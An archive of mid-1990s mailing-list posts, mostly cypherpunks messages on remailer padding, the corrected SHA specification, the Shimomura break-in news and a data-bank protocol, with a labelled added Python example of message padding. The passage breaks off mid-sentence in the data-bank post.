I mean no disrespect, but the atrocities committed by the aged
masters who wrote most of the operating systems are well documented.
I have run into this line of thinking on many occasions (my <insert 
compiler or operating system> is better than yours...), although it
seems to be more of a sore spot to those who love their compiler/
interpreter.  Most of these observations are made out of ignorance.
I get paid for programming under NT, windows, MS-DOS, VMS, RSX, and
UNIX, not insulting the designers or users.

Additionally, I deal with other people in other companies who love
their AS/400s and IBM mainframes.  Hell, there are even several programmers
here who go misty-eyed every time the word Amiga is mentioned.
I bet there is even someone out there who believes that he/she could
write a GUI operating system in COBOL (if someone has accomplished this
I would love to see the punch cards...).

UNIX is a programmer's environment.  It is very flexible, and you can
do just about anything you want to, provided you have the ability.  Spawning
processes and child processes are trivial, and much more efficient compared
to windows-NT and VMS.  Additionally, I don't know of too many operating 
systems where the source code is floating around.  I mean so what if 
it doesn't come with a pretty shrink wrapped package and a thick 
getting-started, if you have a question just go find the source code.  
Geez.  

And as far as a GUI, most of my work revolves around plain old ASCII.
X windows may be "standard" now, but it didn't stop SUN, DEC, etc., from
making their own proprietary (errr.. I mean "optimized") versions.  
I don't know why there is so much whining about:    

 - My GUI interface sucks
 - Your GUI interface sucks
 - Your mother's interface sucks.

I see no reason to puke up this garbage other people.
 
VMS is more secure (interlock intrusion detection, etc.), but any 
operating system is only as strong as its users/administrators.  The one
thing I do not like about VMS is the way the system libraries are 
structured, but such is life.  I was not consulted when DEC was designing
the operating system.  Their Xwindows system needs some work, but it does
work.

NT is cool (if you are running on a 300MHz Sable).  I think it is
something special when you can run UNIX, Windows, and OpenVMS applications
simultaneously on the same box.  Can your operating system do that? 
Hell, for $3500 you can buy a 166MHz alpha that will do this.

System 7 is great.  I just didn't like it.  I didn't like the way
I was isolated from the hardware, forced to take what the designers
thought I needed.  Just my preference.  Besides, Apple equipment was,
and still is overpriced (I should know I used to own several).

Windows isn't a true multitasking operating system, and besides it's like
the old joke, Q: "how do you turn a 486/66 into a 286?" A: "run windows!". 
But like it or not, it is here to stay.  I do like programming under windows
over dos, simply because it is a pre-emptive operating system and forces
the programmers to write structured code (for the most part) to intercept
the messages.  But the serial driver code sucks.

PDP-11/RSX.  Ewwwwww..

MS-DOS.  If you want to write fast graphics, assembly is the way to go.
Windows just can't keep up.  Sure Micro$oft released win-G, but what's the
point.  Your operating system is so much better than mine are, as is your
keyboard, your mouse, etc.,

My point is that every operating system, programming language, or whatever
has benefits and detracting points.  If you want to continue this discussion,
I will be more than happy to create a list for it,.. then you can rant until
your fingers are bloody.

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 28 Jan 95 05:25:18 PST
To: cypherpunks@toad.com
Subject: Secure (!?) Remailer Net
Message-ID: <Pine.3.89.9501280738.A18649-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
    Maybe I'm way behind the curve on this, but...
 
    The traffic analysis that we've seen so far mainly just documents
tcmay's "everybody a remailer" concept.  If you look, you will notice that
these analyses all assume that Alice and Bob are _not_ remailers
themselves, and for a good reason.  If Alice and Bob _are_ remailers,
analysis of the type used here is worthless, especially if Alice and Bob
have a policy of not sending any mail unless they first receive garbage,
and of sending out garbage whenever they get a letter.
 
    HOWEVER, the analysis makes another assumption--that messages are
indistinguishable.  This assumption does not correlate, as I understand it,
with the current remailer net.
 
    There are, as I see it, a couple of modifications that (I think) would
not impose too great a burden on our longsuffering coders, and, as a side
benefit, might allow more flexibility in other matters as well.
 
    Standard packet sizes, as I see it, are not very difficult to
implement, with a couple of assumptions.  (I now assume that all traffic is
intra-remailer-net)
 
    First, the message is signed with the sender's key.  (More on that
later.)
 
    Suppose a signed message to be forwarded is smaller than the standard
packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
the message, the cutmark is added, followed by sufficient garbage to fill
out the standard packet size.  The message is then pgp'ed to the recipient
_with COMPRESS = OFF_.
 
    Upon receipt, the message is decrypted, and its origination can then be
triply verified (at least).  From: line, packet size, and PGP signature.
Since the message claims to be from a packeting remailer, the packet size
should be the standard one.  The recipient now has the message that was
sent to it.  This message is probably itself encrypted, so it can be
handled (almost) as if this message were just received.  This includes
stripping the garbage and (probably) decrypting the message to get the
forwarding information.
 
    Note that this system would allow the extropian remailer to be
compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
like separate pgp packets, or packets it can't read, or something.) Under
the current system, the precaution is entirely warranted.
 
    To make life even more fun, there is no good reason that non-remailers
cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
to be a remailer.  That is, she prepares her message to Bob, (encrypted),
and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
then observes that the message is too small, so she adds the Cutmarks:
header, etc.  When Chaum receives the packet, he opens it, removes the
cutmarks, and sees a signature he does not know.  Chaum then sends a
request to pgp-key-server@omniscient.gov for the key, and holds the message
until he gets it.  He then compares the address and name on the key
received to the message.  The signature is good, so he is ready to send the
packet to Bob.  But Bob can be in on the game as well, since there is no
reason that he cannot handle the Cutmarks:, the signature, and the nested
encryption.  In fact, Alice could include a copy of Bob's key in the
message for Chaum to use, after a Recipient-Key:  header.  Bob can also
verify that the message was actually routed through Chaum.  If Chaum is
concerned that, at some future time, Eve might subpoena his key ring in
order to demonstrate that Alice and Bob are using Chaum, Chaum can
alternately request keys that he does not need from the servers, and delete
(older) keys in the ring.
 
    In other words, if all the remailers can handle nested pgp packets and
cutmarks, we are close to moving all small messages to a standard size.
 
    What if the file is too big?
 
    If the file is too big, break it in pieces.  We need a header,
Multipart Message:  n of m.  Note that since this is assumed to be _inside_
a pgp wrapper, it is secure.  The recipient could hold and merge the files
as needed.  If the message to be forwarded is too big, split and continue.
Since the messages are ascii armored, the split/combine protocol is to
concatenate.  Message parts could be made equal size to minimize the chance
of a message barely bumping over the limit as it moves.  Of course, Alice
could break her message to Bob directly, but we cannot assume that all
would do this for us.
 
    This also means that if Alice sends a message to Bob in the clear
through Chaum, and David, that the message will be encrypted from Chaum to
David.  Thus, if Eve wants to know which message from Chaum to David is the
one from Alice to Bob, (perhaps to know that it is _not_ the message from
Frank she is interested in) she knows only that it was one of the messages
from Chaum to David after Chaum got the message from Alice, and before
David sent it to Bob.  While Chaum and David can both read the message, it
still provides mixing capabilities inside the remailer net itself, and thus,
some protection to Frank.  (Who apparently needs the help.)
 
    A word on remailer keys:  Since pgp uses square-and-multiply for
exponentiation, we see that the amount of work needed to sign a message is
d(m) * (d(e) + o(e)) where d(m) is the digits of the modulus, d(e) digits
of the exponent, and o(e) is the number of ones in e.  (I don't remember
the technical term.) Since the public key is small, each of the parts of
the private key will be large, BUT, there is no reason to assume that we
cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
the remailer.  In fact, it might be possible to move to 768-bit keys for
those that have kept their sizes down in the past.  If pgp handles each
prime separately, we look for a double-lucky modulus.  (And a source of
random numbers that does not involve striking keys!)
 
    Cypherpunks come up with really neato ideas for somebody ELSE to
code...  (Sorry guys, but I've not figured out how to get Unix/TCP/etc
working on my Amiga...yet...)
 
 
    By the way, the following key id's are showing on the list, but are not
on the servers:  27D5B76D 231C7021 34ED427F E37385DD.  The first is the
auto-signer at bb.hks.net.  Also, my modem isn't too thrilled with my
connection these days.  If the signature fails, look for obvious errors in
the text.  Sorry.
 
 
    "PGP?"                      "ITAR!"                      "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Jan 95 06:03:18 PST
To: cypherpunks@toad.com
Subject: NYT on Target Shimomura
Message-ID: <199501281402.JAA17350@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes today on security expert Tsutomu Shimomura, the target
of the break-in Markoff wrote about on Monday. 
 
 
For email copy send blank message with subject:  TSU_shi 
 
 
Here's an excerpt: 
 
 
   Mr. Shimomura, one of the country's most skilled computer 
   security experts, is the person who prompted a Government 
   computer agency to issue a chilling warning on Monday. 
   Unknown intruders, the agency warned, had used a 
   sophisticated break-in technique to steal files from Mr. 
   Shimomura's own well-guarded computer in his home near San 
   Diego. And the stealth and style of the attack indicated 
   that many of the millions of computers connected to the 
   global Internet network could be at risk. There have been 
   at least four other known victims so far, including 
   computers at Loyola University of Chicago, the University 
   of Rochester and Drexel University in Philadelphia. 
 
 
   Since Monday, as the F.B.I. has continued to investigate 
   the crime and look for evidence of break-ins elsewhere, Mr. 
   Shimomura has been answering telephone calls and E-mail 
   from government, corporate and university computer 
   administrators seeking advice on how to arm themselves. 
   Between replies, he has been working feverishly to perfect 
   a new type of protective software that would thwart the 
   burglars. Once it is finished, he intends to distribute the 
   software free over the Internet. 
 
 
   But more than anything else, Mr. Shimomura, who is 30, 
   wants to help the Government catch the crooks. And while he 
   acknowledges that the thieves were clever, Mr. Shimomura 
   has also uncovered signs of ineptitude that he says will be 
   the intruders' eventual undoing. 
 
 
   "Looks like the ankle-biters have learned to read technical 
   manuals," Mr. Shimomura said derisively. "Somebody should 
   teach them some manners. " 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sat, 28 Jan 95 07:59:04 PST
To: cypherpunks@toad.com
Subject: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <POcAlOwsc-G3077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I posed this question in alt.wired. Am I missing something obvious as to
why Wired (or magazines in general) don't do this to make subscribing
easier?
=========================================================================
Why doesn't Wired if it is sooooooo hooked in the online culture have a
PGP public key that 'net users could use to send in their credit card
numbers for subscriptions?

It's a hell of a lot easier than mailing in a cheque or money order. And just
as safe. Wired could have an electronic "form" you could request for them,
to which the public key is attached. You type in the info on the form (ie
name, address, phone number, credit card number etc etc) and encrypt it
and send it to their e-mail address for subscriptions.

Wired then fires off a followup message to the e-mail address from which it
came. Obviously if the address bounces, then the subscription is cancelled.
Or it can also snailmail a subscription  confirmation to the person's address.

Whatever. I just think it would be an easier, on-line way of doing things.
They could use Via Crypt, the commercial PGP version, in keeping with
the widespread use of PGP on the net.
===========================================================================

Personally, I think that IF major enterprises like Wired would use a PGP
application in subscriptions it would contribute greatly to the use of
PGP awareness on the 'net. And that I thought was one of the cypherpunk
items on the agenda.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 28 Jan 95 11:51:43 PST
To: cypherpunks@toad.com
Subject: Re:  Secure (!?) Remailer Net
Message-ID: <199501281951.LAA03940@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
>     The traffic analysis that we've seen so far mainly just documents
> tcmay's "everybody a remailer" concept.  If you look, you will notice that
> these analyses all assume that Alice and Bob are _not_ remailers
> themselves, and for a good reason.  If Alice and Bob _are_ remailers,
> analysis of the type used here is worthless, especially if Alice and Bob
> have a policy of not sending any mail unless they first receive garbage,
> and of sending out garbage whenever they get a letter.

Realistically, though, everybody is not a remailer, and there are no
prospects of everybody becoming a remailer anytime soon, so the analyses
of Wei and others are certainly relevant.

>     HOWEVER, the analysis makes another assumption--that messages are
> indistinguishable.  This assumption does not correlate, as I understand it,
> with the current remailer net.

Mixmaster is supposed to do splitting and, I think, padding.  I hope to
have time to look at it soon.  It sounds very good.

>     First, the message is signed with the sender's key.  (More on that
> later.)

I did not see why this should be done.

>     Suppose a signed message to be forwarded is smaller than the standard
> packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
> the message, the cutmark is added, followed by sufficient garbage to fill
> out the standard packet size.  The message is then pgp'ed to the recipient
> _with COMPRESS = OFF_.

A better approach IMO is to embed the message length in the encrypted
information (as PGP does) and pad with cryptographic random garbage
(which PGP could be patched to do).

>     Upon receipt, the message is decrypted, and its origination can then be
> triply verified (at least).  From: line, packet size, and PGP signature.
> Since the message claims to be from a packeting remailer, the packet size
> should be the standard one.  The recipient now has the message that was
> sent to it.  This message is probably itself encrypted, so it can be
> handled (almost) as if this message were just received.  This includes
> stripping the garbage and (probably) decrypting the message to get the
> forwarding information.

Why does the remailer care where the message came from?  What difference
does that make?  I can see the final recipient caring about the original
sender, so a PGP sig makes sense at that level, but why at each hop?

>     Note that this system would allow the extropian remailer to be
> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
> like separate pgp packets, or packets it can't read, or something.) Under
> the current system, the precaution is entirely warranted.

I don't think so.  The problem with Miron's extropy remailer is that it
only passes through the contents of a PGP block.  For anonymous addresses
to work, the (chained,encrypted) address must be in a PGP block which
precedes the message body.  I don't see how any cutmarks idea would
affect this.

>     To make life even more fun, there is no good reason that non-remailers
> cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
> to be a remailer.  That is, she prepares her message to Bob, (encrypted),
> and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
> then observes that the message is too small, so she adds the Cutmarks:
> header, etc.  When Chaum receives the packet, he opens it, removes the
> cutmarks, and sees a signature he does not know.  Chaum then sends a
> request to pgp-key-server@omniscient.gov for the key, and holds the message
> until he gets it.  He then compares the address and name on the key
> received to the message.  The signature is good, so he is ready to send the
> packet to Bob.

Again, why does the remailer go to all this trouble to verify a
signature from Alice?  That sig is for Bob!  She may not even want to
post her public key for everyone; Bob may be the only one who has it.  I
don't understand why the remailer, which exists to hide identities, is
going to such trouble to verify them on its own.

> But Bob can be in on the game as well, since there is no
> reason that he cannot handle the Cutmarks:, the signature, and the nested
> encryption.  In fact, Alice could include a copy of Bob's key in the
> message for Chaum to use, after a Recipient-Key:  header.

Alice is the one who should encrypt the message for Bob, not the
remailer!  Are you suggesting that she should let the remailer see the
message contents?

> Bob can also
> verify that the message was actually routed through Chaum.

Why on earth does he care?  I really don't see what problem you are
solving here with all this checking.

> If Chaum is
> concerned that, at some future time, Eve might subpoena his key ring in
> order to demonstrate that Alice and Bob are using Chaum, Chaum can
> alternately request keys that he does not need from the servers, and delete
> (older) keys in the ring.

Eve would be more likely to subpoena Chaum's secret key ring.  A public
key ring proves nothing.

>     In other words, if all the remailers can handle nested pgp packets and
> cutmarks, we are close to moving all small messages to a standard size.

This mostly makes sense (although as I said I prefer simply enhancing the
crypto program to take a parameter for output pad size) but I don't see
where all the rest of it came from.

>     What if the file is too big?
>  
>     If the file is too big, break it in pieces.  We need a header,
> Multipart Message:  n of m.  Note that since this is assumed to be _inside_
> a pgp wrapper, it is secure.  The recipient could hold and merge the files
> as needed.  If the message to be forwarded is too big, split and continue.
> Since the messages are ascii armored, the split/combine protocol is to
> concatenate.  Message parts could be made equal size to minimize the chance
> of a message barely bumping over the limit as it moves.  Of course, Alice
> could break her message to Bob directly, but we cannot assume that all
> would do this for us.

I believe Mixmaster provides a client mode to do this.  I prefer putting
more functionality in the hands of the users and not relying on kindly
old Uncle Remailer to do it for you.

>     This also means that if Alice sends a message to Bob in the clear
> through Chaum, and David, that the message will be encrypted from Chaum to
> David.  Thus, if Eve wants to know which message from Chaum to David is the
> one from Alice to Bob, (perhaps to know that it is _not_ the message from
> Frank she is interested in) she knows only that it was one of the messages
> from Chaum to David after Chaum got the message from Alice, and before
> David sent it to Bob.  While Chaum and David can both read the message, it
> still provides mixing capabilities inside the remailer net itself, and thus,
> some protection to Frank.  (Who apparently needs the help.)

This is a commonly made suggestion, but philosophically I am opposed.  We
got into this fix (lack of privacy) by letting people rely on others to
do things for them.  It's time for people to take responsibility on their
own.  The kind of thing you are suggesting provides the illusion of
privacy.  Never trust remailer operators!

>     A word on remailer keys:  Since pgp uses square-and-multiply for
> exponentiation, we see that the amount of work needed to sign a message is
> d(m) * (d(e) + o(e)) where d(m) is the digits of the modulus, d(e) digits
> of the exponent, and o(e) is the number of ones in e.  (I don't remember
> the technical term.) Since the public key is small, each of the parts of
> the private key will be large, BUT, there is no reason to assume that we
> cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
> expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
> the remailer.  In fact, it might be possible to move to 768-bit keys for
> those that have kept their sizes down in the past.  If pgp handles each
> prime separately, we look for a double-lucky modulus.  (And a source of
> random numbers that does not involve striking keys!)

Since the secret key d is effectively a random number from 0 to m, you
would have to create, say, 1000 key pairs to have a good chance of
finding a d that was as much as 10 bits shorter than m.  Then o(d) might
be 5 bits shorter.  So you'd be down from 768+384 to 758+379 or about a
1% reduction in time.  And it will take a while to generate 1000 keys.
To get a 2% reduction you would have to generate 1000000 keys.  I hope
you have a lot of time on your hands.

I'm sorry to have been so negative, but this message is part of a long
tradition advocating putting more responsibility into the remailer net.
I strongly feel that better solutions put power into the users' hands.
I oppose centralized solutions.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLyqgIRnMLJtOy9MBAQF1YAH/Yu68NkN0NnbCTfxDoGm4oc6lCs+dCp6V
pmjinw8zdwBM133eAaaorjtW0KhEvBNMGQTFHeiGJTOt94bE8ELB5g==
=owIt
-----END PGP SIGNATURE-----
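
Added example, not part of either message and not code from any remailer: the two padding schemes discussed in this thread (the cutmark followed by filler from the original proposal, and the length field carried inside the encrypted data that the reply prefers), together with the "n of m" split, applied to the plaintext that would then be encrypted.  The 1024-byte packet size, the cutmark string, the 4-byte header layout and every function name are assumptions made for illustration; encryption itself is left out.

```python
import os
import struct

PACKET_SIZE = 1024                # assumed standard packet size, in bytes
HEADER = struct.Struct(">BBH")    # assumed layout: part index, part count, payload length
MAX_PAYLOAD = PACKET_SIZE - HEADER.size
CUTMARK = b"--cut-here--"         # constructed cutmark line


def pad_with_cutmark(body):
    """Cutmark scheme: body, cutmark line, then filler up to PACKET_SIZE."""
    framed = body + b"\n" + CUTMARK + b"\n"
    if len(framed) > PACKET_SIZE:
        raise ValueError("body too large for one packet")
    # Hex text as filler: its alphabet (0-9a-f) cannot contain the cutmark.
    filler = os.urandom(PACKET_SIZE).hex().encode()[: PACKET_SIZE - len(framed)]
    return framed + filler


def strip_cutmark(packet):
    """Receiver side: keep everything before the first cutmark line."""
    head, sep, _ = packet.partition(b"\n" + CUTMARK + b"\n")
    if not sep:
        raise ValueError("no cutmark found")
    return head


def split_and_pad(message):
    """Length-field scheme: every packet is exactly PACKET_SIZE bytes.

    Each packet is header + chunk + random padding.  The header would sit
    inside the encryption layer, so an observer sees only uniform packets.
    """
    chunks = [message[i:i + MAX_PAYLOAD]
              for i in range(0, len(message), MAX_PAYLOAD)] or [b""]
    if len(chunks) > 255:
        raise ValueError("message needs more than 255 parts")
    packets = []
    for index, chunk in enumerate(chunks, start=1):
        header = HEADER.pack(index, len(chunks), len(chunk))
        padding = os.urandom(MAX_PAYLOAD - len(chunk))
        packets.append(header + chunk + padding)
    return packets


def merge_and_unpad(packets):
    """Reassemble parts received in any order; reject anything inconsistent."""
    parts = {}
    total = None
    for packet in packets:
        if len(packet) != PACKET_SIZE:
            raise ValueError("packet is not the standard size")
        index, count, length = HEADER.unpack_from(packet)
        if count == 0 or not 1 <= index <= count or length > MAX_PAYLOAD:
            raise ValueError("malformed header")
        if total is None:
            total = count
        elif count != total:
            raise ValueError("parts disagree on the part count")
        if index in parts:
            raise ValueError("duplicate part")
        # The length field, not the content, decides where padding starts.
        parts[index] = packet[HEADER.size:HEADER.size + length]
    if total is None or len(parts) != total:
        raise ValueError("missing parts")
    return b"".join(parts[i] for i in range(1, total + 1))


if __name__ == "__main__":
    # Constructed message whose body happens to contain the cutmark line.
    body = b"line one\n" + CUTMARK + b"\nline two"
    print("cutmark scheme recovers:", strip_cutmark(pad_with_cutmark(body)))
    print("length scheme recovers: ", merge_and_unpad(split_and_pad(body)))
```

An in-band delimiter is ambiguous when the body contains it, so the cutmark scheme returns a truncated message for this input, while the length field recovers it intact.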




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 28 Jan 95 12:27:31 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <9501281910.AA20923@snark.imsi.com>
Message-ID: <199501282027.MAA17185@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:
> apparently also pre-correction. Anyone know the proper reference for
> the corrected text?

I append the latest reference I've seen, posted by Robert Perillo in Aug.
Check rand.org:pub/jim/sha.tar.gz for my latest C code.  An #ifdef will
select the broken or fixed versions.

	Jim Gillogly
	7 Solmath S.R. 1995, 20:25

----------------------------
Federal Register  07/11/94
Citation="59 FR 35317"

[Docket No. 940675-4175]
RIN 0693-AB33

Proposed Revision of Federal Information Processing Standard 
(FIPS) 180, Secure Hash Standard

AGENCY: National Institute of Standards and Technology (NIST), 
Commerce.

ACTION: Notice; Request for comments.

SUMMARY: A revision of Federal Information Processing Standard 
(FIPS) 180, Secure Hash Standard (SHS), is being proposed. This 
proposed revision corrects a technical flaw that made the standard 
less secure than had been thought. The algorithm is still reliable 
as a security mechanism, but the correction returns the SHS 
to the original level of security.

   The SHS produces a 160-bit output called a message digest 
for a message of any size. This message digest can be used with 
FIPS 186, Digital Signature Standard (DSS), to compute a signature 
for the message. The same message digest should be obtained 
by the verifier of the signature when the received version of 
the message is used as input to the Secure Hash Algorithm (SHA). 
--------------

         Proposed Modification of the Secure Hash Algorithm

In Section 7 of [1](page 9), the line which reads

    b) For t=16 to 79 let W(t) = W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16).

is to be replaced by

    b) For t=16 to 79 let
                   W(t) = S1( W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16) ).

where S1 is a left circular shift by one bit as defined
in Section 3 of [1](page 6), namely

S1(X) = (X<<1) V (X>>31).


ASCII translator's note : S1 is actually,  S superscript 1.
                          W(t-n) is actually, W subscript, t or t-n.



References:

    [1]  FIPS PUB 180; Secure Hash Standard
         Computer Systems Laboratory
         National Institute of Standards and Technology
         1993 May 11
_____________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Sat, 28 Jan 95 12:58:29 PST
To: cypherpunks@toad.com
Subject: Re: NYT on Target Shimomura
Message-ID: <199501282058.MAA07046@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff <jya@pipeline.com> quotes the NYT quoting Tsutomu Shimomura:

>   "Looks like the ankle-biters have learned to read technical
>   manuals," Mr. Shimomura said derisively. "Somebody should
>   teach them some manners. "

Yeah, that's the Tsutomu I know.  We were classmates at CalTech back in the
early 80's.  Tsutomu has never been known to mince his words.

I'm completely dumbfounded that someone found a way to break into the
computer in Tsutomu's home.  _Firewalls and Internet Security_ mentioned
that he participated in tracking down the Berferd hacker that attacked Los
Alamos, Stanford and AT&T.  Perhaps this latest hacker is related, or was
inspired to try because Tsutomu was mentioned in the book.

When Tsutomu left CalTech after his sophomore year, it was to go to Los
Alamos to do research on using dedicated hardware for fluid dynamics
calculations.  His group made some headlines back then for designing a new
parallel processing machine that Tsutomu described as costing about as much
as a Cray, but performing about 1000 times as fast as a Cray for performing
the single, very widely used function of calculating turbulent fluid flow -
for anything from predicting the weather to designing fighter planes.

(He and I were physics majors, not computer science).

He later went to UC San Diego, where I understood he was doing some manner
of research in theoretical physics.  I've not heard much from him for a
while, though I went to visit him a few years ago, and got to play around
on the computer that got broken into (if it's the same one still around).
Funny thought - Tsutomu just logged me in and went off to sleep, leaving me
to do as I pleased.  I mostly played around with Sun's NeWS software.
Funny that someone else should cause nationwide headlines through coming in
unwelcomed.

Tsutomu is one smart dude.  I consider him among the most intelligent
people I've ever met - and I've met some smart people, working in the
physics community and the computer business.

It happens that I got better grades, overall, than he did at CalTech - but
this is because he spent much of his time off doing research rather than
concentrating on mundane things like sophomore mathematics.  When he did
leave, Lawrence Livermore, Cray and Los Alamos were competing for his
attention.  When I left not too long after, I was unable to get a job at
Taco Bell.  (I'm doing much better now, being well established as a Mac
programmer, and thinking of getting into Linux kernel hacking &
consulting).

Michael D. Crawford
crawford@scruznet.com
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 13:20:04 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: Identity
Message-ID: <ab5062d202021004146c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 5:04 PM 1/26/95, Matthew J Ghio wrote:
>Steve Orr <sorr@eznet.net> wrote:
....
> IP spoofing is, simply put, placing a fake return address on a packet,
> and pretending to be an authorized user on a computer system that you are
> not really on.  This is, basically, a high tech version of an old
> mail-fraud system:  Suppose you sent a letter to a corporation
....
Thanks for your excellent explanation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Fri, 27 Jan 95 20:30:01 PST
To: cypherpunks@toad.com
Subject: It's a Crusade ...
Message-ID: <Pine.SUN.3.91.950128131716.7053A-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


I've really been enjoying the traffic recently - this religious 'skirmish'
has generated nearly as much traffic as the Logo Wars. I do have my own
strong opinions about this particular subject, but I'm fighting back the
compulsion to fly, berserker like, into the fray. However, it might be
time to let it all lie for a while. This is, after all, a list for
cryptography. Users of all kinds/makes/manufacturers of computers need
good crypto software - so in that respect all contenders in this are equal. 

Ding Ding. Time out guys.

-Jon

--
  Jonathon Fletcher,
  jonathon@izanagi.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Sat, 28 Jan 95 11:08:15 PST
To: cypherpunks@toad.com
Subject: SHA Reference?
Message-ID: <9501281908.AA19911@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have the FIPS reference for the latest SHA? I'm writing up
the SHA-AH document and I find that I don't have such a reference --
the best I've got is 

"Proposed Federal Information Processing Standard for Secure Hash
Standard", Federal Register, v57, n21, 31 Jan 1992, p. 3747-3749

And I know that this has since been corrected.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 11:10:18 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <9501281908.AA19911@webster.imsi.com>
Message-ID: <9501281910.AA20923@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I've since found a reference to NIST FIPS Pub #180, but this is
apparently also pre-correction. Anyone know the proper reference for
the corrected text?

.pm

Perry E. Metzger says:
> Does anyone have the FIPS reference for the latest SHA? I'm writing up
> the SHA-AH document and I find that I don't have such a reference --
> the best I've got is 
> 
> "Proposed Federal Information Processing Standard for Secure Hash
> Standard", Federal Register, v57, n21, 31 Jan 1992, p. 3747-3749
> 
> And I know that this has since been corrected.
> 
> Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 15:49:18 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <ab5087cb03021004c425@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Protocols for a Data Bank

The purpose of a data bank is to store large bodies of information for long
periods of time. I suggest here some protocols and contracts for a data
bank and its customers. We then discuss risks, incentives and
stratification of the data storage industry. These ideas implicitly rely on
several types of cryptography-- public key, secure hash, symmetric ciphers
and blind signatures. To explain these technologies here would
substantially obscure the presentation for those who know of such things
and help very little for those who don't.

Here are several transactions that a data bank engages in.

Acquire data: A client anonymously sends a collection of data along with
funds sufficient to warrant the bank's holding the data for a few days and
computing its secure hash. The bank knows the data only by its secure hash.

Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
negotiated price. The hat check specifies the secure hash of the data, the
penalty to be paid upon failure to produce the data, and the cost of
redeeming the data. The hat check is signed blindly by the bank and is a
bearer instrument. Any holder of a hat check can present the check along
with the redemption fee and demand the data. The data bank must then either
produce the data or pay the penalty to the holder of the hat check. A
particular hat check is canceled whenever the bank pays the penalty like a
spent Chaum DigiCash note. The bank can sell multiple hat checks for the
same data. Different hat checks for the same data may specify different
penalties.

Sell a copy of an acquisition: Anyone can request a piece of data
identified only by its secure hash. The bank is free to sell a copy of the
data to anyone with the secure hash. The bank sets the price.

Publish index: The bank can publish its list of hashes. (This makes data
hunters possible.)

Cancel a hat check: A holder of a hat check may sell it back to the bank at
a negotiated price thus releasing the bank from the threat of paying a
penalty in the future. This also allows the bank to retrieve the physical
storage where the data is stored if it is sure that it has not sold other
hat checks for the data.

The hat check may specify expiration dates, cancellation terms etc. The
bank is explicitly permitted to disseminate the data and may well do so to
lay-off risks. In this sense a data bank is like an insurance company that
spreads and shares risks. A hat check may be viewed as a life insurance
policy for the data.

Risks

Dividing trust may be done by agreeing on a notary. Upon redemption, for
instance, a trusted notary might examine the hat check, accept the payment
specified therein from the client, pass over the data on its way from the
